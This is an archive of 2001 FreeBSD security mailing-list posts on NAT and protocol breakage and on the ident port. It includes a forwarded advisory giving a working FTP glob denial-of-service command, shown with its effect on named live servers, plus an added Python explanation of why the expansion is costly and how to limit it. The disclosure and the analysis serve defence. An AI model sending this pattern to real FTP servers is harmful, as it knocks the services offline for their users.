can vary from seconds to hours. ICMP? Some might work, some might
not, again, depends on the vendor. IPsec? Well, NAT completely breaks
AH, but the code to NAT IPsec is completely trivial which does not
imply that a lot of vendors do. Of course, NAT may or may not cause
your IKE negotiations to fail... depending on the NAT implementation
_and_ the IPsec implementation. Any other protocol? Maybe GRE, but
good luck with anything else.

Madness I tell you, madness. As RFC1631 says (an exact quote),

  The negative characteristics [of NAT] are:
  .
  . 
  .
  5. Problems with SNMP, DNS, ... you name it. 
                                  ^^^^^^^^^^^
Damn straight; we've known all of this from the beginning.

And on top of this, whatever you are running at the application layer
might not like NAT either. Some minor protocols like, oh, FTP, need to
have data changed at the application layer to function. The NAT
software effectively has to act as an application proxy.
-- 
Crist J. Clark                           cjclark@alum.mit.edu

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Mar 15  2:20:29 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.freebsd-corp-net-guide.com (mail.freebsd-corp-net-guide.com [206.29.169.15])
	by hub.freebsd.org (Postfix) with ESMTP
	id E785637B719; Thu, 15 Mar 2001 02:20:21 -0800 (PST)
	(envelope-from tedm@toybox.placo.com)
Received: from tedm.placo.com (nat-rtr.freebsd-corp-net-guide.com [206.29.168.154])
	by mail.freebsd-corp-net-guide.com (8.11.1/8.11.1) with SMTP id f2FAAvx03944;
	Thu, 15 Mar 2001 02:10:57 -0800 (PST)
	(envelope-from tedm@toybox.placo.com)
From: "Ted Mittelstaedt" <tedm@toybox.placo.com>
To: "Robert Clark" <res03db2@gte.net>
Cc: "Bob Van Valzah" <Bob@Talarian.Com>,
	"pW" <packetwhore@stargate.net>, <FreeBSD-Security@FreeBSD.ORG>,
	<FreeBSD-Questions@FreeBSD.ORG>
Subject: RE: Racoon Problem & Cisco Tunnel
Date: Thu, 15 Mar 2001 02:10:56 -0800
Message-ID: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0
In-reply-to: <20010313104927.A59404@darkstar.gte.net>
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>-----Original Message-----
>From: owner-freebsd-questions@FreeBSD.ORG
>[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Robert Clark
>
>Ted, do you know of any online guidelines to writing protocols
>that function well with NAT?
>

The rule of thumb is don't embed port information in the data payload.  But
here's some references:

 K. Egevang, P. Francis, "The IP Network Address Translator(NAT)",
 RFC 1631, May 1994.

 T. Hain, "Architectural Implications of NAT", Internet Draft,July 1998.

 Matt Holdrege, Pyda Srisuresh, "IP Network Address Translator(NAT)
 Protocol Issues", Internet Draft, August 1998.

 Yakov Rekhter, "Implications of NATs on the TCP/IP architecture",
 Internet Draft, August 1998.

 P. Srisuresh, Matt Holdrege, "IP Network Address Translator(NAT)
 Terminology and Considerations", Internet Draft, July 1998.

This list is from a post that Jim Gray made to the Questions list back
in October that was very good.

>
>Or maybe a list of protocols that don't work well with NAT?
>

This is entirely implementation dependent.  For example, Cisco has a list
somewhere on their website that shows the ones they do and don't
support.  I don't know if anyone has made up a list for natd.



Ted Mittelstaedt                      tedm@toybox.placo.com
Author of:          The FreeBSD Corporate Networker's Guide
Book website:         http://www.freebsd-corp-net-guide.com



To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Mar 15 10:20: 2 2001
Delivered-To: freebsd-security@freebsd.org
Received: from salseiros.melim.com.br (salseiros.melim.com.br [200.215.110.23])
	by hub.freebsd.org (Postfix) with ESMTP id A5E6937B719
	for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 10:19:55 -0800 (PST)
	(envelope-from ronan@melim.com.br)
Received: from fazendinha (fazendinha.melim.com.br [192.168.168.42])
	by salseiros.melim.com.br (8.9.3/8.9.3) with SMTP id PAA80676
	for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 15:12:47 -0300 (EST)
	(envelope-from ronan@melim.com.br)
Message-ID: <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br>
From: "Ronan Lucio" <ronan@melim.com.br>
To: <security@FreeBSD.ORG>
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com>
Subject: Port 113
Date: Thu, 15 Mar 2001 15:19:20 -0300
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi all,

Could anybody tell me when I need to allow port 113
in the firewall?

What services use this port?

For example: I have a computer that is only a DNS server.
Does this port need to allow connections for the DNS service to work?

Thanks

Ronan Lucio


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Mar 15 10:24:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.epylon.com (sf-gw.epylon.com [63.93.9.98])
	by hub.freebsd.org (Postfix) with ESMTP id 81B6837B718
	for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 10:24:54 -0800 (PST)
	(envelope-from Jason.DiCioccio@Epylon.com)
Received: by goofy.epylon.lan with Internet Mail Service (5.5.2653.19)
	id <G87LPY3P>; Thu, 15 Mar 2001 10:24:53 -0800
Message-ID: <657B20E93E93D4118F9700D0B73CE3EA0166D6D2@goofy.epylon.lan>
From: Jason DiCioccio <Jason.DiCioccio@Epylon.com>
To: 'Ronan Lucio' <ronan@melim.com.br>, security@FreeBSD.ORG
Subject: RE: Port 113
Date: Thu, 15 Mar 2001 10:24:49 -0800
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

No, you don't need it for DNS, but it's identd, used by some daemons
to determine what the lusername of the client that's connecting is.


- -------
Jason DiCioccio
Evil Genius
Unix BOFH

mailto:jasond@epylon.com

415-593-2761          Direct & Fax
415-593-2900          Main

Epylon Corporation
645 Harrison Street, Suite 200
San Francisco, CA 94107
www.epylon.com


- -----Original Message-----
From: Ronan Lucio [mailto:ronan@melim.com.br]
Sent: Thursday, March 15, 2001 10:19 AM
To: security@FreeBSD.ORG
Subject: Port 113


Hi all,

Could anybody tell me when I need to allow port 113
in the firewall?

What services use this port?

For example: I have a computer that is only a DNS server.
Does this port need to allow connections for the DNS service to work?

Thanks

Ronan Lucio


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>

iQA/AwUBOrEJaFCmU62pemyaEQL9IQCgsygTNUOep2NkkDFiuI8dOUUte9AAniQr
ZkwTGZUe4irnB8u1DsuYPQsg
=CdTR
-----END PGP SIGNATURE-----

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Mar 15 10:58:13 2001
Delivered-To: freebsd-security@freebsd.org
Received: from salseiros.melim.com.br (salseiros.melim.com.br [200.215.110.23])
	by hub.freebsd.org (Postfix) with ESMTP id F17C337B719
	for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 10:58:09 -0800 (PST)
	(envelope-from ronan@melim.com.br)
Received: from fazendinha (fazendinha.melim.com.br [192.168.168.42])
	by salseiros.melim.com.br (8.9.3/8.9.3) with SMTP id PAA85297
	for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 15:51:05 -0300 (EST)
	(envelope-from ronan@melim.com.br)
Message-ID: <09bb01c0ad81$ce3a7d60$2aa8a8c0@melim.com.br>
From: "Ronan Lucio" <ronan@melim.com.br>
To: <security@FreeBSD.ORG>
References: <200103151822.f2FIMwp72248@pau-amma.whistle.com>
Subject: Re: Port 113
Date: Thu, 15 Mar 2001 15:57:37 -0300
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> >From: "Ronan Lucio" <ronan@melim.com.br>
> >Date: Thu, 15 Mar 2001 15:19:20 -0300
> 
> >Could anybody tell me when I need to allow port 113
> >in the firewall?
> 
> >What services use this port?

Sorry, I wanted to say: What applications use this port?
What applications use the auth service?
 
> pau-amma[1] grep 113 /etc/services
> auth 113/tcp    ident tap #Authentication Service
> auth 113/udp    ident tap #Authentication Service
> 
> >For example: I have a computer that is only a DNS server.
> >Does this port need to allow connections for the DNS service to work?
> 
> No.
> 
> Cheers,
> david
> -- 
> David Wolfskill      dhw@whistle.com   UNIX System Administrator
> Desk: 650/577-7158   TIE: 8/499-7158   Cell: 650/759-0823
> 


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Mar 15 11: 9:51 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66])
	by hub.freebsd.org (Postfix) with ESMTP
	id 786FC37B719; Thu, 15 Mar 2001 11:09:43 -0800 (PST)
	(envelope-from nate@yogotech.com)
Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131])
	by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id MAA10308;
	Thu, 15 Mar 2001 12:08:04 -0700 (MST)
	(envelope-from nate@nomad.yogotech.com)
Received: (from nate@localhost)
	by nomad.yogotech.com (8.8.8/8.8.8) id MAA05639;
	Thu, 15 Mar 2001 12:08:03 -0700 (MST)
	(envelope-from nate)
From: Nate Williams <nate@yogotech.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15025.4883.482820.502695@nomad.yogotech.com>
Date: Thu, 15 Mar 2001 12:08:03 -0700 (MST)
To: Robert Clark <res03db2@gte.net>
Cc: Ted Mittelstaedt <tedm@toybox.placo.com>,
	Bob Van Valzah <Bob@Talarian.Com>, pW <packetwhore@stargate.net>,
	FreeBSD-Security@FreeBSD.ORG, FreeBSD-Questions@FreeBSD.ORG
Subject: Re: Racoon Problem & Cisco Tunnel
In-Reply-To: <20010313104927.A59404@darkstar.gte.net>
References: <3AACF40D.4080504@Talarian.Com>
	<000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com>
	<20010313104927.A59404@darkstar.gte.net>
X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid
Reply-To: nate@yogotech.com (Nate Williams)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Ted, do you know of any online guidelines to writing protocols
> that function well with NAT?

Here's some:

1) Single TCP socket (UDP requires special NAT code to work correctly).
2) The client must initiate the connection
3) The client's local port must *NOT* be fixed.
4) The server's remote port must be fixed
5) All port/address information must be contained within the packet
   headers (no information must be passed in the contents of the
   packets).

If your protocol follows the above guidelines, it should work fine under
NAT.


Nate

ps. Did I miss anything obvious?

> Or maybe a list of protocols that don't work well with NAT?

Any protocol that doesn't follow the above convention.  DNS (which uses
UDP) is an 'exception' in that most NAT implementations contain special
code to deal with it.

> On Mon, Mar 12, 2001 at 11:02:03PM -0800, Ted Mittelstaedt wrote:
> > >-----Original Message-----
> > >From: owner-freebsd-questions@FreeBSD.ORG
> > >[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah
> > >Sent: Monday, March 12, 2001 8:07 AM
> > >To: pW
> > >Cc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG
> > >Subject: Re: Racoon Problem & Cisco Tunnel
> > >
> > >
> > >Yes. The five DSL setups with which I'm familiar all grant at least one
> > >public address per house. I believe all are static, but one might be
> > >dynamic. Interference with protocols like IPSec is one of the reasons
> > >why I'd make a public address a requirement when choosing a DSL
> > >provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all
> > >possible. Let's hasten the deployment of IPv6.
> > >
> > 
> 
> -snip-
> 
> > 
> > NAT has proven itself reliable and vital and idiot engineers that design TCP
> > protocols that assume everyone has a public IP number are just architecting
> > their own failures, and their protocol's subsequent minimizing by the
> > market.  I have some sympathy for protocols like IPSec that came to be
> > during the same time - but organizational-to-organizational IPSec tunnels
> > don't have to pass through the NAT - they can terminate on it.  But, anyone
> > doing a new protocol today is a fool if it can't work through a NAT.
> > 
> > 
> > 
> > Ted Mittelstaedt                      tedm@toybox.placo.com
> > Author of:          The FreeBSD Corporate Networker's Guide
> > Book website:         http://www.freebsd-corp-net-guide.com
> 

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Mar 15 11:20:49 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66])
	by hub.freebsd.org (Postfix) with ESMTP id 8065637B719
	for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 11:20:37 -0800 (PST)
	(envelope-from nate@yogotech.com)
Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131])
	by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id MAA10524;
	Thu, 15 Mar 2001 12:20:35 -0700 (MST)
	(envelope-from nate@nomad.yogotech.com)
Received: (from nate@localhost)
	by nomad.yogotech.com (8.8.8/8.8.8) id MAA05688;
	Thu, 15 Mar 2001 12:20:31 -0700 (MST)
	(envelope-from nate)
From: Nate Williams <nate@yogotech.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15025.5630.472269.543769@nomad.yogotech.com>
Date: Thu, 15 Mar 2001 12:20:30 -0700 (MST)
To: "Ronan Lucio" <ronan@melim.com.br>
Cc: <security@FreeBSD.ORG>
Subject: Re: Port 113
In-Reply-To: <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br>
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com>
	<099801c0ad7c$75b63800$2aa8a8c0@melim.com.br>
X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid
Reply-To: nate@yogotech.com (Nate Williams)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Could anybody tell me when I need to allow port 113
> in the firewall?

*Need* for auth is a strong word.  However, it does tend to speed up
email transfers if you enable a version that always responds true.

So, any external SMTP servers you have *should* have this port enabled.

> What services use this port?

I know that SMTP uses it, and I believe that ftpd uses it, and I believe
irc also uses it.

> For example: I have a computer that is only a DNS server.
> Does this port need to allow connections for the DNS service to work?

I don't believe so, but someone will certainly correct me if I'm wrong.


Nate

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Mar 15 12:21:23 2001
Delivered-To: freebsd-security@freebsd.org
Received: from k2.jozsef.kando.hu (k2.jozsef.kando.hu [193.224.40.3])
	by hub.freebsd.org (Postfix) with SMTP id A5C5637B719
	for <freebsd-security@FreeBSD.ORG>; Thu, 15 Mar 2001 12:21:18 -0800 (PST)
	(envelope-from bra@fsn.hu)
Received: (qmail 10725 invoked by uid 1000); 15 Mar 2001 20:21:16 -0000
Received: from localhost (sendmail-bs@127.0.0.1)
  by localhost with SMTP; 15 Mar 2001 20:21:16 -0000
Date: Thu, 15 Mar 2001 21:21:16 +0100 (CET)
From: Attila Nagy <bra@fsn.hu>
X-X-Sender:  <bra@k2.jozsef.kando.hu>
To: <freebsd-security@FreeBSD.ORG>
Subject: Multiple vendors FTP denial of service (fwd)
Message-ID: <Pine.BSO.4.33.0103152116530.26292-100000@k2.jozsef.kando.hu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


FreeBSD isn't listed, but is also vulnerable, at least with the ftpd in
-STABLE.

---------- Forwarded message ----------
Date: Thu, 15 Mar 2001 09:34:09 +0100
From: "Frank DENIS (Jedi/Sector One)" <j@4U.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Multiple vendors FTP denial of service

- Proftpd built-in 'ls' command has a globbing bug that allows remote
denial-of-service.

  Here's a simple exploit, tested on the Proftpd site:

$ ftp ftp.proftpd.org
...
Name (ftp.proftpd.org:j): ftp
...
230 Anonymous access granted, restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
227 Entering Passive Mode (216,10,40,219,4,111).
421 Service not available, remote server timed out. Connection closed

  That command takes 100% CPU time on the server. It can lead to an easy
DoS even if only a few remote simultaneous connections are allowed.

  Other FTP servers may be concerned as well. Here are various tries:

- NetBSD FTP showed the same behavior as Proftpd:

ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 EPRT command successful.
(long delay)
421 Service not available, remote server timed out. Connection closed

So NetBSD-ftpd 20000723a may also consume 100% CPU time, resulting in a
possible DoS. Other BSD FTP servers may be affected as well.

- Microsoft FTP Service (Version 5.0) also seems confused by the command:
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
500 'EPSV': command not understood
227 Entering Passive Mode (207,46,133,140,4,223).
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
(very long delay... nothing happens...)

- Publicfile refuses the command:

ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
227 =131,193,178,181,97,222
550 Sorry, I can't open that file: file does not exist.

- Wu-FTPd 2.6.1 is not vulnerable. Only the result of 'ls *' is computed and
displayed.

- PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard
expression to *" and the 'ls *' output.


  Maintainers of vulnerable servers have been warned of this bug.

--
  -=- Frank DENIS aka Jedi/Sector One < spam@jedi.claranet.fr > -=-
		LINAGORA SA (Paris, France) : http://www.linagora.com



To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
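The pattern in the advisory is expensive because of how a classic glob(3) expands it, not because of anything FTP-specific. The Python below is an added example written for this archive, not code from the advisory, from ProFTPD or from any of the servers named; make_tree builds a constructed in-memory directory tree and expand is a deliberately simplified glob whose only job is to count work. Without deduplication, each `*/../` leaves one copy of the same directory per entry matched, so the next `*` rescans it that many times and the cost grows as width to the power of the repeat count. The same function with dedupe=True, or with a match budget (the idea behind the GLOB_LIMIT flag of FreeBSD's glob(3)), shows the two ways out:

```python
import fnmatch


def make_tree(width, depth):
    """Constructed in-memory directory tree standing in for an FTP root:
    every directory holds `width` subdirectories, `depth` levels deep."""
    if depth == 0:
        return {}
    return {"d%d" % i: make_tree(width, depth - 1) for i in range(width)}


def lookup(tree, path):
    node = tree
    for name in path:
        node = node[name]
    return node


class GlobBudgetExceeded(Exception):
    """Expansion touched more directory entries than the caller allowed."""


def expand(tree, pattern, dedupe=False, budget=None):
    """Expand a glob pattern component by component against `tree`.

    dedupe=False behaves like a classic glob(3): every candidate produced by
    a wildcard is carried forward separately, and '..' sends each candidate
    back to its parent without merging, so each '*/../' leaves `width` copies
    of the same directory for the next '*' to rescan.  dedupe=True merges
    identical candidates after every component, which takes the exponent
    out of the pattern.  `budget` caps the total number of directory entries
    examined; exceeding it raises GlobBudgetExceeded.

    Returns (matches, entries_examined); matches may repeat without dedupe.
    """
    candidates = [()]
    examined = 0
    for comp in pattern.split("/"):
        nxt = []
        for cand in candidates:
            if comp == "..":
                nxt.append(cand[:-1])
                continue
            entries = lookup(tree, cand)
            examined += len(entries)
            if budget is not None and examined > budget:
                raise GlobBudgetExceeded("gave up after %d entries" % examined)
            nxt.extend(cand + (name,) for name in entries
                       if fnmatch.fnmatchcase(name, comp))
        candidates = list(dict.fromkeys(nxt)) if dedupe else nxt
    return ["/".join(c) for c in candidates], examined


def naive_cost(width, repeats):
    """Entries a non-deduplicating glob examines for ('*/../' * repeats) + '*'
    in a tree of the given width: width + width**2 + ... + width**(repeats+1)."""
    return sum(width ** i for i in range(1, repeats + 2))


def within_budget(tree, pattern, budget):
    """True if a naive expansion of `pattern` finishes inside `budget`."""
    try:
        expand(tree, pattern, budget=budget)
        return True
    except GlobBudgetExceeded:
        return False


if __name__ == "__main__":
    tree = make_tree(4, 2)
    advisory = "*/../" * 12 + "*"
    print("naive cost of the advisory pattern, width 4:", naive_cost(4, 12))
    print("two repeats, naive:", expand(tree, "*/../*/../*")[1], "entries")
    print("two repeats, deduped:", expand(tree, "*/../*/../*", dedupe=True)[1], "entries")
    print("advisory pattern within a 10000-entry budget:",
          within_budget(tree, advisory, 10000))
```

naive_cost(4, 12) is the work for the advisory's twelve repetitions in a directory of only four entries, already tens of millions of entry comparisons; real anonymous FTP roots are wider. Note that the budgeted version still burns CPU up to the limit and the deduplicating version still enumerates every unique match, so a server also wants a per-connection CPU limit or a pattern simplification step like the "Simplified wildcard expression to *" that Pure-FTPd reports.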


From owner-freebsd-security  Thu Mar 15 12:35:29 2001
Delivered-To: freebsd-security@freebsd.org
Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193])
	by hub.freebsd.org (Postfix) with ESMTP id 9C0F837B746
	for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 12:35:18 -0800 (PST)
	(envelope-from adam@algroup.co.uk)
Received: from algroup.co.uk (socks-fw.aldigital.co.uk [192.168.254.10]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id UAA14780; Thu, 15 Mar 2001 20:33:36 GMT
Message-ID: <3AB1261F.23B8BE75@algroup.co.uk>
Date: Thu, 15 Mar 2001 20:29:19 +0000
From: Adam Laurie <adam@algroup.co.uk>
Organization: A.L. Group plc
X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.2-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Nate Williams <nate@yogotech.com>
Cc: Ronan Lucio <ronan@melim.com.br>, security@FreeBSD.ORG
Subject: Re: Port 113
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com>
		<099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> <15025.5630.472269.543769@nomad.yogotech.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Nate Williams wrote:
> 
> > Could anybody tell me when I need to allow port 113
> > in the firewall?
> 
> *Need* for auth is a strong word.  However, it does tend to speed up
> email transfers if you enable a version that always responds true.
> 
> So, any external SMTP servers you have *should* have this port enabled.
> 
> > What services use this port?
> 
> I know that SMTP uses it, and I believe that ftpd uses it, and I believe
> irc also uses it.

smtp does not need to use it - you can achieve the same speedy transfers
by telling your smtp server not to bother. e.g. for sendmail:

  O Timeout.ident=0s
 
> > For example: I have a computer that is only a DNS server.
> > Does this port need to allow connections for the DNS service to work?
> 
> I don't believe so, but someone will certainly correct me if I'm wrong.

dns does not need ident.

cheers,
Adam
--
Adam Laurie                   Tel: +44 (20) 8742 0755
A.L. Digital Ltd.             Fax: +44 (20) 8742 5995
Voysey House                  http://www.thebunker.net
Barley Mow Passage            http://www.aldigital.co.uk
London W4 4GB                 mailto:adam@algroup.co.uk
UNITED KINGDOM                PGP key on keyservers

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Thu Mar 15 12:36:44 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66])
	by hub.freebsd.org (Postfix) with ESMTP id E0FF737B71A
	for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 12:36:34 -0800 (PST)
	(envelope-from nate@yogotech.com)
Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131])
	by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id NAA11956;
	Thu, 15 Mar 2001 13:36:17 -0700 (MST)
	(envelope-from nate@nomad.yogotech.com)
Received: (from nate@localhost)
	by nomad.yogotech.com (8.8.8/8.8.8) id NAA06986;
	Thu, 15 Mar 2001 13:36:16 -0700 (MST)
	(envelope-from nate)
From: Nate Williams <nate@yogotech.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15025.10176.676792.32675@nomad.yogotech.com>
Date: Thu, 15 Mar 2001 13:36:16 -0700 (MST)
To: Adam Laurie <adam@algroup.co.uk>
Cc: Nate Williams <nate@yogotech.com>,
	Ronan Lucio <ronan@melim.com.br>, security@FreeBSD.ORG
Subject: Re: Port 113
In-Reply-To: <3AB1261F.23B8BE75@algroup.co.uk>
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com>
	<099801c0ad7c$75b63800$2aa8a8c0@melim.com.br>
	<15025.5630.472269.543769@nomad.yogotech.com>
	<3AB1261F.23B8BE75@algroup.co.uk>
X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid
Reply-To: nate@yogotech.com (Nate Williams)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > > Could anybody tell me when I need to allow port 113
> > > in the firewall?
> > 
> > *Need* for auth is a strong word.  However, it does tend to speed up
> > email transfers if you enable a version that always responds true.
> > 
> > So, any external SMTP servers you have *should* have this port enabled.
> > 
> > > What services use this port?
> > 
> > I know that SMTP uses it, and I believe that ftpd uses it, and I believe
> > irc also uses it.
> 
> smtp does not need to use it - you can achieve the same speedy transfers
> by telling your smtp server not to bother. e.g. for sendmail:
> 
>   O Timeout.ident=0s

My local sendmail doesn't use *my* ident server, but remote sendmail
servers use *my* ident server, so using ident locally speeds up mail
transfers *to* my host.

I certainly don't use ident for local email. :)



Nate



From owner-freebsd-security  Thu Mar 15 12:39:35 2001
Delivered-To: freebsd-security@freebsd.org
Received: from satin.team.look.ca (satin.team.look.ca [207.136.94.3])
	by hub.freebsd.org (Postfix) with ESMTP id ED95037B71A
	for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 12:39:32 -0800 (PST)
	(envelope-from JTERLECKI@team.look.ca)
Received: by satin.team.look.ca with Internet Mail Service (5.5.2650.21)
	id <G71H69Q8>; Thu, 15 Mar 2001 15:45:03 -0500
Message-ID: <552BB9A0AF05D411B71C0050DAC27561012ADB15@LOOKEX.look>
From: Jason Terlecki <JTERLECKI@team.look.ca>
To: Ronan Lucio <ronan@melim.com.br>, security@FreeBSD.ORG
Subject: RE: Port 113
Date: Thu, 15 Mar 2001 15:39:20 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

No,

this port is used by identd.  Many IRC servers require you to be able to
respond on that port when you connect to it.
It allows daemons to determine the username of a connecting client.

Jason Terlecki
System Analyst - Internet
Look Communication - Montreal

-----Original Message-----
From: Ronan Lucio [mailto:ronan@melim.com.br]
Sent: March 15, 2001 1:19 PM
To: security@FreeBSD.ORG
Subject: Port 113


Hi all,

Could anybody tell me when I need to allow port 113
in the firewall?

What services use this port?

For example: I have a computer that is only a DNS server.
Does this port need to allow connections for the DNS service to work?

Thanks

Ronan Lucio





From owner-freebsd-security  Thu Mar 15 13:41:27 2001
Delivered-To: freebsd-security@freebsd.org
Received: from d156h168.resnet.uconn.edu (d156h168.resnet.uconn.edu [137.99.156.168])
	by hub.freebsd.org (Postfix) with SMTP id 17BAE37B718
	for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 13:41:19 -0800 (PST)
	(envelope-from sirmoo@cowbert.2y.net)
Received: (qmail 61572 invoked by alias); 15 Mar 2001 21:41:30 -0000
Received: from unknown (HELO sirmoobert) (137.99.158.30)
  by d156h168.resnet.uconn.edu with SMTP; 15 Mar 2001 21:41:30 -0000
Message-ID: <002301c0ad98$a2677fa0$1e9e6389@137.99.156.23>
From: "Peter C. Lai" <sirmoo@cowbert.2y.net>
To: "Ronan Lucio" <ronan@melim.com.br>, <security@FreeBSD.ORG>
References: <552BB9A0AF05D411B71C0050DAC27561012ADB15@LOOKEX.look>
Subject: Re: Port 113
Date: Thu, 15 Mar 2001 16:41:03 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

many IRC servers also require a valid rdns when doing the ident lookup.  I
know when I am on a system which has no rdns, identd (port 113) is necessary
but not sufficient to let me connect to almost all EFNet servers.
